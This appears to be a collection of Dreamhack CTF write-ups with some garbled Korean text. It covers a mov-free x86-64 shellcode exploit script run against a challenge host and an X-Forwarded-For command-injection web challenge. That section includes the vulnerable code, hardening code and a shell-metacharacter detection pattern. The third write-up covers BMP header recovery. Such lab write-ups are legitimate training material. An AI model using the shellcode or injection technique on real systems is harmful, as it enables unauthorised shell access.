No mov (pwnable)
Description
Shellcoding should feel familiar by now, right? Let's test whether you can still write shellcode when mov is not available.
This binary checks whether the shellcode you send contains any bytes that correspond to mov, and executes it only if none are found.
Read ./flag by whatever means you can!
solve.py
64bit shellcode
\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05
๊ตฌ๊ธ์ ๊ฒ์ํด๋ณด๋ฉด ๊ณต๊ฐ๋์๋ 23 Bytes Shell Code (๊ธฐ๋ณธ ์์ฝ๋)์์ ์์ ์ ์กฐ๊ธ ํ๋ฉด ๋๋ค.
movabs ๋ช
๋ น์ด ๋์ ์ push, pop, shl, or ์ด์
๋ธ๋ฆฌ ๋ช
๋ น์ด๋ฅผ ์ด์ฉํด์
movabs rbx,0x68732f2f6e69622f ๋ช
๋ น์ด ๋์ฒด๊ฐ ๊ฐ๋ฅํ๋ค.
from pwn import *
import warnings

#context.log_level = 'debug'
context(arch='amd64', os='linux')
warnings.filterwarnings('ignore')

p = process("./main")                      # local run (the remote connection below replaces it)
p = remote("host3.dreamhack.games", 9532)

payload  = b"\x31\xf6"                     # xor esi, esi
#payload += b"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  # movabs rbx, 0x68732f2f6e69622f (contains a mov opcode)
payload += b"\x68\x2F\x62\x69\x6E"         # push 0x6e69622f  '/bin'
payload += b"\x68\x2F\x2F\x73\x68"         # push 0x68732f2f  '//sh'
payload += b"\x5B"                         # pop rbx          rbx = 0x68732f2f
payload += b"\x48\xC1\xE3\x20"             # shl rbx, 32      rbx = 0x68732f2f00000000 (0x68732f2f << 32)
payload += b"\x58"                         # pop rax          rax = 0x6e69622f
payload += b"\x48\x09\xC3"                 # or rbx, rax      rbx = 0x68732f2f6e69622f (0x68732f2f00000000 | 0x6e69622f)
payload += b"\x56"                         # push rsi         (rsi = 0, NULL terminator / envp)
payload += b"\x53"                         # push rbx         "/bin//sh"
payload += b"\x54"                         # push rsp
payload += b"\x5f"                         # pop rdi          rdi -> "/bin//sh"
payload += b"\x6a\x3b"                     # push 0x3b
payload += b"\x58"                         # pop rax          rax = 0x3b (execve)
payload += b"\x31\xd2"                     # xor edx, edx
payload += b"\x0f\x05"                     # syscall

p.sendafter("Give me your shellcode > ", payload)
p.interactive()
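As an added example (not from the writeup), the following emulates the push/pop/shl/or replacement for movabs and runs a mov-opcode byte scan over both byte sequences from the page. The opcode set and the byte-scan model of the binary's check are assumptions, since the challenge's actual filter is not shown; it also generalises the trick to any 64-bit constant and shows the sign-extension case where it breaks.

```python
MASK32 = 0xFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF

# Primary opcode bytes of the x86-64 mov family: 88-8B, 8C/8E, A0-A3, B0-BF, C6/C7.
# Assumption: the challenge binary does a plain byte scan; its real filter is not shown.
MOV_OPCODES = (set(range(0x88, 0x8C)) | {0x8C, 0x8E} | set(range(0xA0, 0xA4))
               | set(range(0xB0, 0xC0)) | {0xC6, 0xC7})

# The two byte sequences from the writeup: the public 23-byte shellcode and the mov-free variant.
ORIGINAL_23 = bytes.fromhex("31f648bb2f62696e2f2f73685653545f6a3b5831d20f05")
MOV_FREE = bytes.fromhex("31f6682f62696e682f2f73685b48c1e320584809c35653545f6a3b5831d20f05")


def contains_mov_byte(code: bytes) -> bool:
    """True if any byte sits in a mov opcode range (prefix-naive, so it can over-report)."""
    return any(b in MOV_OPCODES for b in code)


def split_for_push(value: int) -> tuple:
    """Split a 64-bit constant into the two imm32 halves the push trick needs.
    push imm32 sign-extends onto the stack, so the low half must have bit 31 clear,
    otherwise 'or rbx, rax' would smear 0xFFFFFFFF over the high dword."""
    low, high = value & MASK32, (value >> 32) & MASK32
    if low & 0x80000000:
        raise ValueError("low dword has bit 31 set; sign extension would corrupt the result")
    return low, high


def build_rbx_without_mov(low: int, high: int) -> int:
    """Emulate: push low; push high; pop rbx; shl rbx, 32; pop rax; or rbx, rax."""
    def imm32_slot(imm):                 # the 8-byte value push imm32 leaves on the stack
        return imm | (MASK64 ^ MASK32) if imm & 0x80000000 else imm
    stack = [imm32_slot(low), imm32_slot(high)]
    rbx = stack.pop()                    # pop rbx  -> high half
    rbx = (rbx << 32) & MASK64           # shl rbx, 32 (any sign-extension bits shift out)
    rax = stack.pop()                    # pop rax  -> low half
    return rbx | rax                     # or rbx, rax


if __name__ == "__main__":
    low, high = split_for_push(0x68732f2f6e69622f)
    rbx = build_rbx_without_mov(low, high)
    print(hex(rbx), rbx.to_bytes(8, "little"))                          # 0x68732f2f6e69622f b'/bin//sh'
    print(contains_mov_byte(ORIGINAL_23), contains_mov_byte(MOV_FREE))  # True False
```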
Result
seo@seo:~/Documents/dreamhack/no_mov$ python3 solve.py
[+] Starting local process './main': pid 12373
[+] Opening connection to host3.dreamhack.games on port 9532: Done
[*] Switching to interactive mode
$ ls
flag
main
$ cat flag
DH{1809e85d58743e0c0758ae0795cd0c7092d7adf49d7cbe3d836b1a6a0676fee6}
$
[*] Interrupted
[*] Closed connection to host3.dreamhack.games port 9532
[*] Stopped process './main' (pid 12373)
FLAG
DH{1809e85d58743e0c0758ae0795cd0c7092d7adf49d7cbe3d836b1a6a0676fee6}
what-is-my-ip (web)
Description
How are they aware of us even behind the wall?
FYI
Flag Location: /flag
Flag Format: DH{...}
haproxy.cfg
global
    daemon
    maxconn 256

defaults
    mode http
    timeout connect 50000ms
    timeout client 50000ms
    timeout server 50000ms

listen http-in
    bind *:8000
    option forwardfor
    server app app:3000
app.py
#!/usr/bin/python3
import os
from subprocess import run, TimeoutExpired
from flask import Flask, request, render_template

app = Flask(__name__)
app.secret_key = os.urandom(64)

@app.route('/')
def flag():
    # access_route[0] is the left-most X-Forwarded-For entry, i.e. a value the client controls
    user_ip = request.access_route[0] if request.access_route else request.remote_addr
    try:
        # the header text is interpolated, unquoted, into a bash command string
        result = run(
            ["/bin/bash", "-c", f"echo {user_ip}"],
            capture_output=True,
            text=True,
            timeout=3,
        )
        return render_template("ip.html", result=result.stdout)
    except TimeoutExpired:
        return render_template("ip.html", result="Timeout!")

app.run(host='0.0.0.0', port=3000)
Solution
Add an X-Forwarded-For header and inject a command through it.
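Added example, not the challenge's code: the first two helpers mirror how app.py picks request.access_route[0] and builds its bash command, and the rest show the hardened alternative (trust only proxy-appended entries, accept only IP literals, never shell out) plus a log check. The header values and the 172.18.0.2 proxy address are constructed.

```python
import ipaddress
import re

# Constructed sample request: the client sends its own X-Forwarded-For value and HAProxy
# ('option forwardfor') appends the address it actually saw; Werkzeug joins them with commas.
CLIENT_SENT = "203.0.113.9; echo injected"    # attacker-chosen text, not an IP literal
PROXY_SAW = "198.51.100.7"
XFF_HEADER = f"{CLIENT_SENT}, {PROXY_SAW}"
APP_REMOTE_ADDR = "172.18.0.2"                 # the proxy container, as the Flask app sees it

SHELL_META = re.compile(r"[;&|`$()<>]")        # characters that never belong in an XFF entry

def access_route_first(xff_header, remote_addr):
    """Mirror request.access_route[0] in app.py: the left-most entry, i.e. whatever the client sent."""
    return xff_header.split(",")[0].strip() if xff_header else remote_addr

def argv_as_built(user_ip):
    """Exactly the argv app.py passes to run(): header text interpolated into a 'bash -c' string."""
    return ["/bin/bash", "-c", f"echo {user_ip}"]

def trusted_client_ip(xff_header, remote_addr, trusted_hops=1):
    """Hardened selection: count entries from the right, one per trusted proxy, and accept
    nothing that does not parse as an IP literal (ValueError otherwise). No shell is involved."""
    entries = [e.strip() for e in xff_header.split(",")] if xff_header else []
    candidate = entries[-trusted_hops] if len(entries) >= trusted_hops else remote_addr
    return str(ipaddress.ip_address(candidate))

def flag_suspicious_xff(xff_header):
    """Detection helper for proxy or app logs: shell metacharacters in X-Forwarded-For."""
    return bool(xff_header) and SHELL_META.search(xff_header) is not None

if __name__ == "__main__":
    print(argv_as_built(access_route_first(XFF_HEADER, APP_REMOTE_ADDR)))
    print(trusted_client_ip(XFF_HEADER, APP_REMOTE_ADDR))   # 198.51.100.7
    print(flag_suspicious_xff(XFF_HEADER))                    # True
```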


FLAG
DH{1acfe9db38697eb71538e97e71882f1ad6deb5cb9d8c3448bd05d3adb805e559}
BMP Recovery (misc, forensics)
Description
Who would wipe such important values from a BMP file!
Recover it quickly and read the flag!
The flag format is DH{...}; you can find it once flag.bmp has been correctly recovered.
chal.py
with open('flag.bmp', 'rb') as f:
    data = bytearray(f.read())

data[:0x1C] = b'\x00' * 0x1C        # wipe BITMAPFILEHEADER plus biSize, biWidth, biHeight, biPlanes
data[0x22:0x36] = b'\x00' * 0x14    # wipe biSizeImage through biClrImportant (biBitCount/biCompression survive)

with open('flag.bmp.broken', 'wb') as f:
    f.write(data)
get_resolution_posibility.py
def find_multiplication_expression(number):
    expressions = []
    for i in range(1, number+1):
        if number % i == 0:
            expressions.append((i, number // i))
    return expressions

if __name__ == "__main__":
    biSizeImage = 4769856    # biSizeImage / 3, i.e. biWidth * biHeight for 24 bpp
    multiplication_expressions = find_multiplication_expression(biSizeImage)
    print(f"{biSizeImage}를 곱한 수들:")
    for expression in multiplication_expressions:
        print(f"{expression[0]} * {expression[1]}")
C:\Users\Seo Hyun-gyu\Downloads\2a248953-26de-4e3d-b23c-5193d9d2a653>python3 get_resolution_posibility.py
4769856를 곱한 수들:
1 * 4769856 2 * 2384928 3 * 1589952 4 * 1192464 6 * 794976 7 * 681408 8 * 596232 9 * 529984 12 * 397488 13 * 366912 14 * 340704 16 * 298116 18 * 264992 21 * 227136 24 * 198744 26 * 183456 28 * 170352 32 * 149058 36 * 132496 39 * 122304 42 * 113568 48 * 99372 49 * 97344 52 * 91728 56 * 85176 63 * 75712 64 * 74529 72 * 66248 78 * 61152 84 * 56784 91 * 52416 96 * 49686 98 * 48672 104 * 45864 112 * 42588 117 * 40768 126 * 37856 144 * 33124 147 * 32448 156 * 30576 168 * 28392 169 * 28224 182 * 26208 192 * 24843 196 * 24336 208 * 22932 224 * 21294 234 * 20384 252 * 18928 273 * 17472 288 * 16562 294 * 16224 312 * 15288 336 * 14196 338 * 14112 364 * 13104 392 * 12168 416 * 11466 441 * 10816 448 * 10647 468 * 10192 504 * 9464 507 * 9408 546 * 8736 576 * 8281 588 * 8112 624 * 7644 637 * 7488 672 * 7098 676 * 7056 728 * 6552 784 * 6084 819 * 5824 832 * 5733 882 * 5408 936 * 5096 1008 * 4732 1014 * 4704 1092 * 4368 1176 * 4056 1183 * 4032 1248 * 3822 1274 * 3744 1344 * 3549 1352 * 3528 1456 * 3276 1521 * 3136 1568 * 3042 1638 * 2912 1764 * 2704 1872 * 2548 1911 * 2496 2016 * 2366 2028 * 2352 2184 * 2184 2352 * 2028 2366 * 2016 2496 * 1911 2548 * 1872 2704 * 1764 2912 * 1638 3042 * 1568 3136 * 1521 3276 * 1456 3528 * 1352 3549 * 1344 3744 * 1274 3822 * 1248 4032 * 1183 4056 * 1176 4368 * 1092 4704 * 1014 4732 * 1008 5096 * 936 5408 * 882 5733 * 832 5824 * 819 6084 * 784 6552 * 728 7056 * 676 7098 * 672 7488 * 637 7644 * 624 8112 * 588 8281 * 576 8736 * 546 9408 * 507 9464 * 504 10192 * 468 10647 * 448 10816 * 441 11466 * 416 12168 * 392 13104 * 364 14112 * 338 14196 * 336 15288 * 312 16224 * 294 16562 * 288 17472 * 273 18928 * 252 20384 * 234 21294 * 224 22932 * 208 24336 * 196 24843 * 192 26208 * 182 28224 * 169 28392 * 168 30576 * 156 32448 * 147 33124 * 144 37856 * 126 40768 * 117 42588 * 112 45864 * 104 48672 * 98 49686 * 96 52416 * 91 56784 * 84
61152 * 78 66248 * 72 74529 * 64 75712 * 63 85176 * 56 91728 * 52 97344 * 49 99372 * 48 113568 * 42 122304 * 39 132496 * 36 149058 * 32 170352 * 28 183456 * 26 198744 * 24 227136 * 21 264992 * 18 298116 * 16 340704 * 14 366912 * 13 397488 * 12 529984 * 9 596232 * 8 681408 * 7 794976 * 6 1192464 * 4 1589952 * 3 2384928 * 2 4769856 * 1
For a 24 bpp image with no row padding: biSizeImage = biWidth * biHeight * 3
14309568 = biWidth * biHeight * 3
4769856 = biWidth * biHeight
After enumerating every factor pair, the correct resolution turned out to be biWidth = 2548, biHeight = 1872.
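Added example (not from the writeup) that generalises the factor enumeration above: it reproduces the wipe from chal.py on a constructed BMP, enumerates candidate resolutions with row padding taken into account, and rebuilds the zeroed header fields from the survivors and the chosen resolution. The 2835 px/m value written into the wiped resolution fields is an assumption.

```python
import struct

FILE_HDR_LEN, INFO_HDR_LEN = 14, 40
PIXEL_OFFSET = FILE_HDR_LEN + INFO_HDR_LEN     # 0x36: chal.py leaves everything from here intact
PELS_PER_METER = 2835                          # assumed 72 DPI for the wiped resolution fields

def make_bmp(width, height, bitcount=24):
    """Minimal 24-bit BMP with constructed pixel bytes (test data, not the challenge file)."""
    stride = (width * bitcount // 8 + 3) & ~3  # rows are padded to a multiple of 4 bytes
    pixels = bytes((i * 7) & 0xFF for i in range(stride * height))
    file_hdr = struct.pack("<2sIHHI", b"BM", PIXEL_OFFSET + len(pixels), 0, 0, PIXEL_OFFSET)
    info_hdr = struct.pack("<IiiHHIIiiII", INFO_HDR_LEN, width, height, 1, bitcount, 0,
                           len(pixels), PELS_PER_METER, PELS_PER_METER, 0, 0)
    return file_hdr + info_hdr + pixels

def wipe_like_chal(data):
    """Reproduce chal.py: zero 0x00-0x1B and 0x22-0x35; only biBitCount (0x1C) and
    biCompression (0x1E) survive in the info header."""
    d = bytearray(data)
    d[:0x1C] = b"\x00" * 0x1C
    d[0x22:0x36] = b"\x00" * 0x14
    return bytes(d)

def candidate_resolutions(pixel_bytes, bitcount):
    """All (width, height) whose padded stride * height equals the pixel-data length; the page's
    plain factor enumeration ignores padding, which is harmless for 2548 (3 * 2548 % 4 == 0)."""
    bpp = bitcount // 8
    out = []
    for width in range(1, pixel_bytes // bpp + 1):
        stride = (width * bpp + 3) & ~3
        if pixel_bytes % stride == 0:
            out.append((width, pixel_bytes // stride))
    return out

def repair_header(broken, width, height):
    """Rebuild the wiped fields from the survivors, the file length and the chosen resolution."""
    bitcount, compression = struct.unpack_from("<HI", broken, 0x1C)
    size_image = len(broken) - PIXEL_OFFSET    # biSizeImage, where the page's enumeration starts
    file_hdr = struct.pack("<2sIHHI", b"BM", len(broken), 0, 0, PIXEL_OFFSET)
    info_hdr = struct.pack("<IiiHHIIiiII", INFO_HDR_LEN, width, height, 1, bitcount, compression,
                           size_image, PELS_PER_METER, PELS_PER_METER, 0, 0)
    return file_hdr + info_hdr + bytes(broken[PIXEL_OFFSET:])

if __name__ == "__main__":
    original = make_bmp(4, 2)
    broken = wipe_like_chal(original)
    print(candidate_resolutions(len(broken) - PIXEL_OFFSET, 24))   # includes (4, 2)
    print(repair_header(broken, 4, 2) == original)                 # True
```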
Solution
The recovered bmp header is as follows.

flag.bmp
